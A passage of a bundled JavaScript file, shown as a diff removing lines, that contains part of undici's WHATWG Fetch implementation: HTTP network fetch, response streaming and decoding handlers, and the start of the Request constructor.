deflate') - } - } - - httpRequest.headersList.delete('host') - - // 20. If includeCredentials is true, then: - if (includeCredentials) { - // 1. If the user agent is not configured to block cookies for httpRequest - // (see section 7 of [COOKIES]), then: - // TODO: credentials - // 2. If httpRequest’s header list does not contain `Authorization`, then: - // TODO: credentials - } - - // 21. If there’s a proxy-authentication entry, use it as appropriate. - // TODO: proxy-authentication - - // 22. Set httpCache to the result of determining the HTTP cache - // partition, given httpRequest. - // TODO: cache - - // 23. If httpCache is null, then set httpRequest’s cache mode to - // "no-store". - if (httpCache == null) { - httpRequest.cache = 'no-store' - } - - // 24. If httpRequest’s cache mode is neither "no-store" nor "reload", - // then: - if (httpRequest.mode !== 'no-store' && httpRequest.mode !== 'reload') { - // TODO: cache - } - - // 9. If aborted, then return the appropriate network error for fetchParams. - // TODO - - // 10. If response is null, then: - if (response == null) { - // 1. If httpRequest’s cache mode is "only-if-cached", then return a - // network error. - if (httpRequest.mode === 'only-if-cached') { - return makeNetworkError('only if cached') - } - - // 2. Let forwardResponse be the result of running HTTP-network fetch - // given httpFetchParams, includeCredentials, and isNewConnectionFetch. - const forwardResponse = await httpNetworkFetch( - httpFetchParams, - includeCredentials, - isNewConnectionFetch - ) - - // 3. If httpRequest’s method is unsafe and forwardResponse’s status is - // in the range 200 to 399, inclusive, invalidate appropriate stored - // responses in httpCache, as per the "Invalidation" chapter of HTTP - // Caching, and set storedResponse to null. [HTTP-CACHING] - if ( - !safeMethodsSet.has(httpRequest.method) && - forwardResponse.status >= 200 && - forwardResponse.status <= 399 - ) { - // TODO: cache - } - - // 4. If the revalidatingFlag is set and forwardResponse’s status is 304, - // then: - if (revalidatingFlag && forwardResponse.status === 304) { - // TODO: cache - } - - // 5. If response is null, then: - if (response == null) { - // 1. Set response to forwardResponse. - response = forwardResponse - - // 2. Store httpRequest and forwardResponse in httpCache, as per the - // "Storing Responses in Caches" chapter of HTTP Caching. [HTTP-CACHING] - // TODO: cache - } - } - - // 11. Set response’s URL list to a clone of httpRequest’s URL list. - response.urlList = [...httpRequest.urlList] - - // 12. If httpRequest’s header list contains `Range`, then set response’s - // range-requested flag. - if (httpRequest.headersList.contains('range')) { - response.rangeRequested = true - } - - // 13. Set response’s request-includes-credentials to includeCredentials. - response.requestIncludesCredentials = includeCredentials - - // 14. If response’s status is 401, httpRequest’s response tainting is not - // "cors", includeCredentials is true, and request’s window is an environment - // settings object, then: - // TODO - - // 15. If response’s status is 407, then: - if (response.status === 407) { - // 1. If request’s window is "no-window", then return a network error. - if (request.window === 'no-window') { - return makeNetworkError() - } - - // 2. ??? - - // 3. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams)) { - return makeAppropriateNetworkError(fetchParams) - } - - // 4. Prompt the end user as appropriate in request’s window and store - // the result as a proxy-authentication entry. [HTTP-AUTH] - // TODO: Invoke some kind of callback? - - // 5. Set response to the result of running HTTP-network-or-cache fetch given - // fetchParams. - // TODO - return makeNetworkError('proxy authentication required') - } - - // 16. If all of the following are true - if ( - // response’s status is 421 - response.status === 421 && - // isNewConnectionFetch is false - !isNewConnectionFetch && - // request’s body is null, or request’s body is non-null and request’s body’s source is non-null - (request.body == null || request.body.source != null) - ) { - // then: - - // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams)) { - return makeAppropriateNetworkError(fetchParams) - } - - // 2. Set response to the result of running HTTP-network-or-cache - // fetch given fetchParams, isAuthenticationFetch, and true. - - // TODO (spec): The spec doesn't specify this but we need to cancel - // the active response before we can start a new one. - // https://github.com/whatwg/fetch/issues/1293 - fetchParams.controller.connection.destroy() - - response = await httpNetworkOrCacheFetch( - fetchParams, - isAuthenticationFetch, - true - ) - } - - // 17. If isAuthenticationFetch is true, then create an authentication entry - if (isAuthenticationFetch) { - // TODO - } - - // 18. Return response. - return response -} - -// https://fetch.spec.whatwg.org/#http-network-fetch -async function httpNetworkFetch ( - fetchParams, - includeCredentials = false, - forceNewConnection = false -) { - assert(!fetchParams.controller.connection || fetchParams.controller.connection.destroyed) - - fetchParams.controller.connection = { - abort: null, - destroyed: false, - destroy (err) { - if (!this.destroyed) { - this.destroyed = true - this.abort?.(err ?? new DOMException('The operation was aborted.', 'AbortError')) - } - } - } - - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 4. Let httpCache be the result of determining the HTTP cache partition, - // given request. - // TODO: cache - const httpCache = null - - // 5. If httpCache is null, then set request’s cache mode to "no-store". - if (httpCache == null) { - request.cache = 'no-store' - } - - // 6. Let networkPartitionKey be the result of determining the network - // partition key given request. - // TODO - - // 7. Let newConnection be "yes" if forceNewConnection is true; otherwise - // "no". - const newConnection = forceNewConnection ? 'yes' : 'no' // eslint-disable-line no-unused-vars - - // 8. Switch on request’s mode: - if (request.mode === 'websocket') { - // Let connection be the result of obtaining a WebSocket connection, - // given request’s current URL. - // TODO - } else { - // Let connection be the result of obtaining a connection, given - // networkPartitionKey, request’s current URL’s origin, - // includeCredentials, and forceNewConnection. - // TODO - } - - // 9. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. If connection is failure, then return a network error. - - // 2. Set timingInfo’s final connection timing info to the result of - // calling clamp and coarsen connection timing info with connection’s - // timing info, timingInfo’s post-redirect start time, and fetchParams’s - // cross-origin isolated capability. - - // 3. If connection is not an HTTP/2 connection, request’s body is non-null, - // and request’s body’s source is null, then append (`Transfer-Encoding`, - // `chunked`) to request’s header list. - - // 4. Set timingInfo’s final network-request start time to the coarsened - // shared current time given fetchParams’s cross-origin isolated - // capability. - - // 5. Set response to the result of making an HTTP request over connection - // using request with the following caveats: - - // - Follow the relevant requirements from HTTP. [HTTP] [HTTP-SEMANTICS] - // [HTTP-COND] [HTTP-CACHING] [HTTP-AUTH] - - // - If request’s body is non-null, and request’s body’s source is null, - // then the user agent may have a buffer of up to 64 kibibytes and store - // a part of request’s body in that buffer. If the user agent reads from - // request’s body beyond that buffer’s size and the user agent needs to - // resend request, then instead return a network error. - - // - Set timingInfo’s final network-response start time to the coarsened - // shared current time given fetchParams’s cross-origin isolated capability, - // immediately after the user agent’s HTTP parser receives the first byte - // of the response (e.g., frame header bytes for HTTP/2 or response status - // line for HTTP/1.x). - - // - Wait until all the headers are transmitted. - - // - Any responses whose status is in the range 100 to 199, inclusive, - // and is not 101, are to be ignored, except for the purposes of setting - // timingInfo’s final network-response start time above. - - // - If request’s header list contains `Transfer-Encoding`/`chunked` and - // response is transferred via HTTP/1.0 or older, then return a network - // error. - - // - If the HTTP request results in a TLS client certificate dialog, then: - - // 1. If request’s window is an environment settings object, make the - // dialog available in request’s window. - - // 2. Otherwise, return a network error. - - // To transmit request’s body body, run these steps: - let requestBody = null - // 1. If body is null and fetchParams’s process request end-of-body is - // non-null, then queue a fetch task given fetchParams’s process request - // end-of-body and fetchParams’s task destination. - if (request.body == null && fetchParams.processRequestEndOfBody) { - queueMicrotask(() => fetchParams.processRequestEndOfBody()) - } else if (request.body != null) { - // 2. Otherwise, if body is non-null: - - // 1. Let processBodyChunk given bytes be these steps: - const processBodyChunk = async function * (bytes) { - // 1. If the ongoing fetch is terminated, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. Run this step in parallel: transmit bytes. - yield bytes - - // 3. If fetchParams’s process request body is non-null, then run - // fetchParams’s process request body given bytes’s length. - fetchParams.processRequestBodyChunkLength?.(bytes.byteLength) - } - - // 2. Let processEndOfBody be these steps: - const processEndOfBody = () => { - // 1. If fetchParams is canceled, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. If fetchParams’s process request end-of-body is non-null, - // then run fetchParams’s process request end-of-body. - if (fetchParams.processRequestEndOfBody) { - fetchParams.processRequestEndOfBody() - } - } - - // 3. Let processBodyError given e be these steps: - const processBodyError = (e) => { - // 1. If fetchParams is canceled, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. If e is an "AbortError" DOMException, then abort fetchParams’s controller. - if (e.name === 'AbortError') { - fetchParams.controller.abort() - } else { - fetchParams.controller.terminate(e) - } - } - - // 4. Incrementally read request’s body given processBodyChunk, processEndOfBody, - // processBodyError, and fetchParams’s task destination. - requestBody = (async function * () { - try { - for await (const bytes of request.body.stream) { - yield * processBodyChunk(bytes) - } - processEndOfBody() - } catch (err) { - processBodyError(err) - } - })() - } - - try { - // socket is only provided for websockets - const { body, status, statusText, headersList, socket } = await dispatch({ body: requestBody }) - - if (socket) { - response = makeResponse({ status, statusText, headersList, socket }) - } else { - const iterator = body[Symbol.asyncIterator]() - fetchParams.controller.next = () => iterator.next() - - response = makeResponse({ status, statusText, headersList }) - } - } catch (err) { - // 10. If aborted, then: - if (err.name === 'AbortError') { - // 1. If connection uses HTTP/2, then transmit an RST_STREAM frame. - fetchParams.controller.connection.destroy() - - // 2. Return the appropriate network error for fetchParams. - return makeAppropriateNetworkError(fetchParams, err) - } - - return makeNetworkError(err) - } - - // 11. Let pullAlgorithm be an action that resumes the ongoing fetch - // if it is suspended. - const pullAlgorithm = () => { - fetchParams.controller.resume() - } - - // 12. Let cancelAlgorithm be an algorithm that aborts fetchParams’s - // controller with reason, given reason. - const cancelAlgorithm = (reason) => { - fetchParams.controller.abort(reason) - } - - // 13. Let highWaterMark be a non-negative, non-NaN number, chosen by - // the user agent. - // TODO - - // 14. Let sizeAlgorithm be an algorithm that accepts a chunk object - // and returns a non-negative, non-NaN, non-infinite number, chosen by the user agent. - // TODO - - // 15. Let stream be a new ReadableStream. - // 16. Set up stream with pullAlgorithm set to pullAlgorithm, - // cancelAlgorithm set to cancelAlgorithm, highWaterMark set to - // highWaterMark, and sizeAlgorithm set to sizeAlgorithm. - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - const stream = new ReadableStream( - { - async start (controller) { - fetchParams.controller.controller = controller - }, - async pull (controller) { - await pullAlgorithm(controller) - }, - async cancel (reason) { - await cancelAlgorithm(reason) - } - }, - { - highWaterMark: 0, - size () { - return 1 - } - } - ) - - // 17. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. Set response’s body to a new body whose stream is stream. - response.body = { stream } - - // 2. If response is not a network error and request’s cache mode is - // not "no-store", then update response in httpCache for request. - // TODO - - // 3. If includeCredentials is true and the user agent is not configured - // to block cookies for request (see section 7 of [COOKIES]), then run the - // "set-cookie-string" parsing algorithm (see section 5.2 of [COOKIES]) on - // the value of each header whose name is a byte-case-insensitive match for - // `Set-Cookie` in response’s header list, if any, and request’s current URL. - // TODO - - // 18. If aborted, then: - // TODO - - // 19. Run these steps in parallel: - - // 1. Run these steps, but abort when fetchParams is canceled: - fetchParams.controller.on('terminated', onAborted) - fetchParams.controller.resume = async () => { - // 1. While true - while (true) { - // 1-3. See onData... - - // 4. Set bytes to the result of handling content codings given - // codings and bytes. - let bytes - let isFailure - try { - const { done, value } = await fetchParams.controller.next() - - if (isAborted(fetchParams)) { - break - } - - bytes = done ? undefined : value - } catch (err) { - if (fetchParams.controller.ended && !timingInfo.encodedBodySize) { - // zlib doesn't like empty streams. - bytes = undefined - } else { - bytes = err - - // err may be propagated from the result of calling readablestream.cancel, - // which might not be an error. https://github.com/nodejs/undici/issues/2009 - isFailure = true - } - } - - if (bytes === undefined) { - // 2. Otherwise, if the bytes transmission for response’s message - // body is done normally and stream is readable, then close - // stream, finalize response for fetchParams and response, and - // abort these in-parallel steps. - readableStreamClose(fetchParams.controller.controller) - - finalizeResponse(fetchParams, response) - - return - } - - // 5. Increase timingInfo’s decoded body size by bytes’s length. - timingInfo.decodedBodySize += bytes?.byteLength ?? 0 - - // 6. If bytes is failure, then terminate fetchParams’s controller. - if (isFailure) { - fetchParams.controller.terminate(bytes) - return - } - - // 7. Enqueue a Uint8Array wrapping an ArrayBuffer containing bytes - // into stream. - fetchParams.controller.controller.enqueue(new Uint8Array(bytes)) - - // 8. If stream is errored, then terminate the ongoing fetch. - if (isErrored(stream)) { - fetchParams.controller.terminate() - return - } - - // 9. If stream doesn’t need more data ask the user agent to suspend - // the ongoing fetch. - if (!fetchParams.controller.controller.desiredSize) { - return - } - } - } - - // 2. If aborted, then: - function onAborted (reason) { - // 2. If fetchParams is aborted, then: - if (isAborted(fetchParams)) { - // 1. Set response’s aborted flag. - response.aborted = true - - // 2. If stream is readable, then error stream with the result of - // deserialize a serialized abort reason given fetchParams’s - // controller’s serialized abort reason and an - // implementation-defined realm. - if (isReadable(stream)) { - fetchParams.controller.controller.error( - fetchParams.controller.serializedAbortReason - ) - } - } else { - // 3. Otherwise, if stream is readable, error stream with a TypeError. - if (isReadable(stream)) { - fetchParams.controller.controller.error(new TypeError('terminated', { - cause: isErrorLike(reason) ? reason : undefined - })) - } - } - - // 4. If connection uses HTTP/2, then transmit an RST_STREAM frame. - // 5. Otherwise, the user agent should close connection unless it would be bad for performance to do so. - fetchParams.controller.connection.destroy() - } - - // 20. Return response. - return response - - async function dispatch ({ body }) { - const url = requestCurrentURL(request) - /** @type {import('../..').Agent} */ - const agent = fetchParams.controller.dispatcher - - return new Promise((resolve, reject) => agent.dispatch( - { - path: url.pathname + url.search, - origin: url.origin, - method: request.method, - body: fetchParams.controller.dispatcher.isMockActive ? request.body && (request.body.source || request.body.stream) : body, - headers: request.headersList.entries, - maxRedirections: 0, - upgrade: request.mode === 'websocket' ? 'websocket' : undefined - }, - { - body: null, - abort: null, - - onConnect (abort) { - // TODO (fix): Do we need connection here? - const { connection } = fetchParams.controller - - if (connection.destroyed) { - abort(new DOMException('The operation was aborted.', 'AbortError')) - } else { - fetchParams.controller.on('terminated', abort) - this.abort = connection.abort = abort - } - }, - - onHeaders (status, headersList, resume, statusText) { - if (status < 200) { - return - } - - let codings = [] - let location = '' - - const headers = new Headers() - - // For H2, the headers are a plain JS object - // We distinguish between them and iterate accordingly - if (Array.isArray(headersList)) { - for (let n = 0; n < headersList.length; n += 2) { - const key = headersList[n + 0].toString('latin1') - const val = headersList[n + 1].toString('latin1') - if (key.toLowerCase() === 'content-encoding') { - // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 - // "All content-coding values are case-insensitive..." - codings = val.toLowerCase().split(',').map((x) => x.trim()) - } else if (key.toLowerCase() === 'location') { - location = val - } - - headers[kHeadersList].append(key, val) - } - } else { - const keys = Object.keys(headersList) - for (const key of keys) { - const val = headersList[key] - if (key.toLowerCase() === 'content-encoding') { - // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 - // "All content-coding values are case-insensitive..." - codings = val.toLowerCase().split(',').map((x) => x.trim()).reverse() - } else if (key.toLowerCase() === 'location') { - location = val - } - - headers[kHeadersList].append(key, val) - } - } - - this.body = new Readable({ read: resume }) - - const decoders = [] - - const willFollow = request.redirect === 'follow' && - location && - redirectStatusSet.has(status) - - // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Encoding - if (request.method !== 'HEAD' && request.method !== 'CONNECT' && !nullBodyStatus.includes(status) && !willFollow) { - for (const coding of codings) { - // https://www.rfc-editor.org/rfc/rfc9112.html#section-7.2 - if (coding === 'x-gzip' || coding === 'gzip') { - decoders.push(zlib.createGunzip({ - // Be less strict when decoding compressed responses, since sometimes - // servers send slightly invalid responses that are still accepted - // by common browsers. - // Always using Z_SYNC_FLUSH is what cURL does. - flush: zlib.constants.Z_SYNC_FLUSH, - finishFlush: zlib.constants.Z_SYNC_FLUSH - })) - } else if (coding === 'deflate') { - decoders.push(zlib.createInflate()) - } else if (coding === 'br') { - decoders.push(zlib.createBrotliDecompress()) - } else { - decoders.length = 0 - break - } - } - } - - resolve({ - status, - statusText, - headersList: headers[kHeadersList], - body: decoders.length - ? pipeline(this.body, ...decoders, () => { }) - : this.body.on('error', () => {}) - }) - - return true - }, - - onData (chunk) { - if (fetchParams.controller.dump) { - return - } - - // 1. If one or more bytes have been transmitted from response’s - // message body, then: - - // 1. Let bytes be the transmitted bytes. - const bytes = chunk - - // 2. Let codings be the result of extracting header list values - // given `Content-Encoding` and response’s header list. - // See pullAlgorithm. - - // 3. Increase timingInfo’s encoded body size by bytes’s length. - timingInfo.encodedBodySize += bytes.byteLength - - // 4. See pullAlgorithm... - - return this.body.push(bytes) - }, - - onComplete () { - if (this.abort) { - fetchParams.controller.off('terminated', this.abort) - } - - fetchParams.controller.ended = true - - this.body.push(null) - }, - - onError (error) { - if (this.abort) { - fetchParams.controller.off('terminated', this.abort) - } - - this.body?.destroy(error) - - fetchParams.controller.terminate(error) - - reject(error) - }, - - onUpgrade (status, headersList, socket) { - if (status !== 101) { - return - } - - const headers = new Headers() - - for (let n = 0; n < headersList.length; n += 2) { - const key = headersList[n + 0].toString('latin1') - const val = headersList[n + 1].toString('latin1') - - headers[kHeadersList].append(key, val) - } - - resolve({ - status, - statusText: STATUS_CODES[status], - headersList: headers[kHeadersList], - socket - }) - - return true - } - } - )) - } -} - -module.exports = { - fetch, - Fetch, - fetching, - finalizeAndReportTiming -} - - -/***/ }), - -/***/ 8359: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -/* globals AbortController */ - - - -const { extractBody, mixinBody, cloneBody } = __nccwpck_require__(1472) -const { Headers, fill: fillHeaders, HeadersList } = __nccwpck_require__(554) -const { FinalizationRegistry } = __nccwpck_require__(6436)() -const util = __nccwpck_require__(3983) -const { - isValidHTTPToken, - sameOrigin, - normalizeMethod, - makePolicyContainer, - normalizeMethodRecord -} = __nccwpck_require__(2538) -const { - forbiddenMethodsSet, - corsSafeListedMethodsSet, - referrerPolicy, - requestRedirect, - requestMode, - requestCredentials, - requestCache, - requestDuplex -} = __nccwpck_require__(1037) -const { kEnumerableProperty } = util -const { kHeaders, kSignal, kState, kGuard, kRealm } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { URLSerializer } = __nccwpck_require__(685) -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { getMaxListeners, setMaxListeners, getEventListeners, defaultMaxListeners } = __nccwpck_require__(2361) - -let TransformStream = globalThis.TransformStream - -const kAbortController = Symbol('abortController') - -const requestFinalizer = new FinalizationRegistry(({ signal, abort }) => { - signal.removeEventListener('abort', abort) -}) - -// https://fetch.spec.whatwg.org/#request-class -class Request { - // https://fetch.spec.whatwg.org/#dom-request - constructor (input, init = {}) { - if (input === kConstruct) { - return - } - - webidl.argumentLengthCheck(arguments, 1, { header: 'Request constructor' }) - - input = webidl.converters.RequestInfo(input) - init = webidl.converters.RequestInit(init) - - // https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object - this[kRealm] = { - settingsObject: { - baseUrl: getGlobalOrigin(), - get origin () { - return this.baseUrl?.origin - }, - policyContainer: makePolicyContainer() - } - } - - // 1. Let request be null. - let request = null - - // 2. Let fallbackMode be null. - let fallbackMode = null - - // 3. Let baseURL be this’s relevant settings object’s API base URL. - const baseUrl = this[kRealm].settingsObject.baseUrl - - // 4. Let signal be null. - let signal = null - - // 5. If input is a string, then: - if (typeof input === 'string') { - // 1. Let parsedURL be the result of parsing input with baseURL. - // 2. If parsedURL is failure, then throw a TypeError. - let parsedURL - try { - parsedURL = new URL(input, baseUrl) - } catch (err) { - throw new TypeError('Failed to parse URL from ' + input, { cause: err }) - } - - // 3. If parsedURL includes credentials, then throw a TypeError. - if (parsedURL.username || parsedURL.password) { - throw new TypeError( - 'Request cannot be constructed from a URL that includes credentials: ' + - input - ) - } - - // 4. Set request to a new request whose URL is parsedURL. - request = makeRequest({ urlList: [parsedURL] }) - - // 5. Set fallbackMode to "cors". - fallbackMode = 'cors' - } else { - // 6. Otherwise: - - // 7. Assert: input is a Request object. - assert(input instanceof Request) - - // 8. Set request to input’s request. - request = input[kState] - - // 9. Set signal to input’s signal. - signal = input[kSignal] - } - - // 7. Let origin be this’s relevant settings object’s origin. - const origin = this[kRealm].settingsObject.origin - - // 8. Let window be "client". - let window = 'client' - - // 9. If request’s window is an environment settings object and its origin - // is same origin with origin, then set window to request’s window. - if ( - request.window?.constructor?.name === 'EnvironmentSettingsObject' && - sameOrigin(request.window, origin) - ) { - window = request.window - } - - // 10. If init["window"] exists and is non-null, then throw a TypeError. - if (init.window != null) { - throw new TypeError(`'window' option '${window}' must be null`) - } - - // 11. If init["window"] exists, then set window to "no-window". - if ('window' in init) { - window = 'no-window' - } - - // 12. Set request to a new request with the following properties: - request = makeRequest({ - // URL request’s URL. - // undici implementation note: this is set as the first item in request's urlList in makeRequest - // method request’s method. - method: request.method, - // header list A copy of request’s header list. - // undici implementation note: headersList is cloned in makeRequest - headersList: request.headersList, - // unsafe-request flag Set. - unsafeRequest: request.unsafeRequest, - // client This’s relevant settings object. - client: this[kRealm].settingsObject, - // window window. - window, - // priority request’s priority. - priority: request.priority, - // origin request’s origin. The propagation of the origin is only significant for navigation requests - // being handled by a service worker. In this scenario a request can have an origin that is different - // from the current client. - origin: request.origin, - // referrer request’s referrer. - referrer: request.referrer, - // referrer policy request’s referrer policy. - referrerPolicy: request.referrerPolicy, - // mode request’s mode. - mode: request.mode, - // credentials mode request’s credentials mode. - credentials: request.credentials, - // cache mode request’s cache mode. - cache: request.cache, - // redirect mode request’s redirect mode. - redirect: request.redirect, - // integrity metadata request’s integrity metadata. - integrity: request.integrity, - // keepalive request’s keepalive. - keepalive: request.keepalive, - // reload-navigation flag request’s reload-navigation flag. - reloadNavigation: request.reloadNavigation, - // history-navigation flag request’s history-navigation flag. - historyNavigation: request.historyNavigation, - // URL list A clone of request’s URL list. - urlList: [...request.urlList] - }) - - const initHasKey = Object.keys(init).length !== 0 - - // 13. If init is not empty, then: - if (initHasKey) { - // 1. If request’s mode is "navigate", then set it to "same-origin". - if (request.mode === 'navigate') { - request.mode = 'same-origin' - } - - // 2. Unset request’s reload-navigation flag. - request.reloadNavigation = false - - // 3. Unset request’s history-navigation flag. - request.historyNavigation = false - - // 4. Set request’s origin to "client". - request.origin = 'client' - - // 5. Set request’s referrer to "client" - request.referrer = 'client' - - // 6. Set request’s referrer policy to the empty string. - request.referrerPolicy = '' - - // 7. Set request’s URL to request’s current URL. - request.url = request.urlList[request.urlList.length - 1] - - // 8. Set request’s URL list to « request’s URL ». - request.urlList = [request.url] - } - - // 14. If init["referrer"] exists, then: - if (init.referrer !== undefined) { - // 1. Let referrer be init["referrer"]. - const referrer = init.referrer - - // 2. If referrer is the empty string, then set request’s referrer to "no-referrer". - if (referrer === '') { - request.referrer = 'no-referrer' - } else { - // 1. Let parsedReferrer be the result of parsing referrer with - // baseURL. - // 2. If parsedReferrer is failure, then throw a TypeError. - let parsedReferrer - try { - parsedReferrer = new URL(referrer, baseUrl) - } catch (err) { - throw new TypeError(`Referrer "${referrer}" is not a valid URL.`, { cause: err }) - } - - // 3. If one of the following is true - // - parsedReferrer’s scheme is "about" and path is the string "client" - // - parsedReferrer’s origin is not same origin with origin - // then set request’s referrer to "client". - if ( - (parsedReferrer.protocol === 'about:' && parsedReferrer.hostname === 'client') || - (origin && !sameOrigin(parsedReferrer, this[kRealm].settingsObject.baseUrl)) - ) { - request.referrer = 'client' - } else { - // 4. Otherwise, set request’s referrer to parsedReferrer. - request.referrer = parsedReferrer - } - } - } - - // 15. If init["referrerPolicy"] exists, then set request’s referrer policy - // to it. - if (init.referrerPolicy !== undefined) { - request.referrerPolicy = init.referrerPolicy - } - - // 16. Let mode be init["mode"] if it exists, and fallbackMode otherwise. - let mode - if (init.mode !== undefined) { - mode = init.mode - } else { - mode = fallbackMode - } - - // 17. If mode is "navigate", then throw a TypeError. - if (mode === 'navigate') { - throw webidl.errors.exception({ - header: 'Request constructor', - message: 'invalid request mode navigate.' - }) - } - - // 18. If mode is non-null, set request’s mode to mode. - if (mode != null) { - request.mode = mode - } - - // 19. If init["credentials"] exists, then set request’s credentials mode - // to it. - if (init.credentials !== undefined) { - request.credentials = init.credentials - } - - // 18. If init["cache"] exists, then set request’s cache mode to it. - if (init.cache !== undefined) { - request.cache = init.cache - } - - // 21. If request’s cache mode is "only-if-cached" and request’s mode is - // not "same-origin", then throw a TypeError. - if (request.cache === 'only-if-cached' && request.mode !== 'same-origin') { - throw new TypeError( - "'only-if-cached' can be set only with 'same-origin' mode" - ) - } - - // 22. If init["redirect"] exists, then set request’s redirect mode to it. - if (init.redirect !== undefined) { - request.redirect = init.redirect - } - - // 23. If init["integrity"] exists, then set request’s integrity metadata to it. - if (init.integrity != null) { - request.integrity = String(init.integrity) - } - - // 24. If init["keepalive"] exists, then set request’s keepalive to it. - if (init.keepalive !== undefined) { - request.keepalive = Boolean(init.keepalive) - } - - // 25. If init["method"] exists, then: - if (init.method !== undefined) { - // 1. Let method be init["method"]. - let method = init.method - - // 2. If method is not a method or method is a forbidden method, then - // throw a TypeError. - if (!isValidHTTPToken(method)) { - throw new TypeError(`'${method}' is not a valid HTTP method.`) - } - - if (forbiddenMethodsSet.has(method.toUpperCase())) { - throw new TypeError(`'${method}' HTTP method is unsupported.`) - } - - // 3. Normalize method. - method = normalizeMethodRecord[method] ?? normalizeMethod(method) - - // 4. Set request’s method to method. - request.method = method - } - - // 26. If init["signal"] exists, then set signal to it. - if (init.signal !== undefined) { - signal = init.signal - } - - // 27. Set this’s request to request. - this[kState] = request - - // 28. Set this’s signal to a new AbortSignal object with this’s relevant - // Realm. - // TODO: could this be simplified with AbortSignal.any - // (https://dom.spec.whatwg.org/#dom-abortsignal-any) - const ac = new AbortController() - this[kSignal] = ac.signal - this[kSignal][kRealm] = this[kRealm] - - // 29. If signal is not null, then make this’s signal follow signal. - if (signal != null) { - if ( - !signal || - typeof signal.aborted !== 'boolean' || - typeof signal.addEventListener !== 'function' - ) { - throw new TypeError( - "Failed to construct 'Request': member signal is not of type AbortSignal." - ) - } - - if (signal.aborted) { - ac.abort(signal.reason) - } else { - // Keep a strong ref to ac while request object - // is alive. This is needed to prevent AbortController - // from being prematurely garbage collected. - // See, https://github.com/nodejs/undici/issues/1926. - this[kAbortController] = ac - - const acRef = new WeakRef(ac) - const abort = function () { - const ac = acRef.deref() - if (ac !== undefined) { - ac.abort(this.reason) - } - } - - // Third-party AbortControllers may not work with these. - // See, https://github.com/nodejs/undici/pull/1910#issuecomment-1464495619. - try { - // If the max amount of listeners is equal to the default, increase it - // This is only available in node >= v19.9.0 - if (typeof getMaxListeners === 'function' && getMaxListeners(signal) === defaultMaxListeners) { - setMaxListeners(100, signal) - } else if (getEventListeners(signal, 'abort').length >= defaultMaxListeners) { - setMaxListeners(100, signal) - } - } catch {} - - util.addAbortListener(signal, abort) - requestFinalizer.register(ac, { signal, abort }) - } - } - - // 30. Set this’s headers to a new Headers object with this’s relevant - // Realm, whose header list is request’s header list and guard is - // "request". - this[kHeaders] = new Headers(kConstruct) - this[kHeaders][kHeadersList] = request.headersList - this[kHeaders][kGuard] = 'request' - this[kHeaders][kRealm] = this[kRealm] - - // 31. If this’s request’s mode is "no-cors", then: - if (mode === 'no-cors') { - // 1. If this’s request’s method is not a CORS-safelisted method, - // then throw a TypeError. - if (!corsSafeListedMethodsSet.has(request.method)) { - throw new TypeError( - `'${request.method} is unsupported in no-cors mode.` - ) - } - - // 2. Set this’s headers’s guard to "request-no-cors". - this[kHeaders][kGuard] = 'request-no-cors' - } - - // 32. If init is not empty, then: - if (initHasKey) { - /** @type {HeadersList} */ - const headersList = this[kHeaders][kHeadersList] - // 1. Let headers be a copy of this’s headers and its associated header - // list. - // 2. If init["headers"] exists, then set headers to init["headers"]. - const headers = init.headers !== undefined ? init.headers : new HeadersList(headersList) - - // 3. Empty this’s headers’s header list. - headersList.clear() - - // 4. If headers is a Headers object, then for each header in its header - // list, append header’s name/header’s value to this’s headers. - if (headers instanceof HeadersList) { - for (const [key, val] of headers) { - headersList.append(key, val) - } - // Note: Copy the `set-cookie` meta-data. - headersList.cookies = headers.cookies - } else { - // 5. Otherwise, fill this’s headers with headers. - fillHeaders(this[kHeaders], headers) - } - } - - // 33. Let inputBody be input’s request’s body if input is a Request - // object; otherwise null. - const inputBody = input instanceof Request ? input[kState].body : null - - // 34. If either init["body"] exists and is non-null or inputBody is - // non-null, and request’s method is `GET` or `HEAD`, then throw a - // TypeError. - if ( - (init.body != null || inputBody != null) && - (request.method === 'GET' || request.method === 'HEAD') - ) { - throw new TypeError('Request with GET/HEAD method cannot have body.') - } - - // 35. Let initBody be null. - let initBody = null - - // 36. If init["body"] exists and is non-null, then: - if (init.body != null) { - // 1. Let Content-Type be null. - // 2. Set initBody and Content-Type to the result of extracting - // init["body"], with keepalive set to request’s keepalive. - const [extractedBody, contentType] = extractBody( - init.body, - request.keepalive - ) - initBody = extractedBody - - // 3, If Content-Type is non-null and this’s headers’s header list does - // not contain `Content-Type`, then append `Content-Type`/Content-Type to - // this’s headers. - if (contentType && !this[kHeaders][kHeadersList].contains('content-type')) { - this[kHeaders].append('content-type', contentType) - } - } - - // 37. Let inputOrInitBody be initBody if it is non-null; otherwise - // inputBody. - const inputOrInitBody = initBody ?? inputBody - - // 38. If inputOrInitBody is non-null and inputOrInitBody’s source is - // null, then: - if (inputOrInitBody != null && inputOrInitBody.source == null) { - // 1. If initBody is non-null and init["duplex"] does not exist, - // then throw a TypeError. - if (initBody != null && init.duplex == null) { - throw new TypeError('RequestInit: duplex option is required when sending a body.') - } - - // 2. If this’s request’s mode is neither "same-origin" nor "cors", - // then throw a TypeError. - if (request.mode !== 'same-origin' && request.mode !== 'cors') { - throw new TypeError( - 'If request is made from ReadableStream, mode should be "same-origin" or "cors"' - ) - } - - // 3. Set this’s request’s use-CORS-preflight flag. - request.useCORSPreflightFlag = true - } - - // 39. Let finalBody be inputOrInitBody. 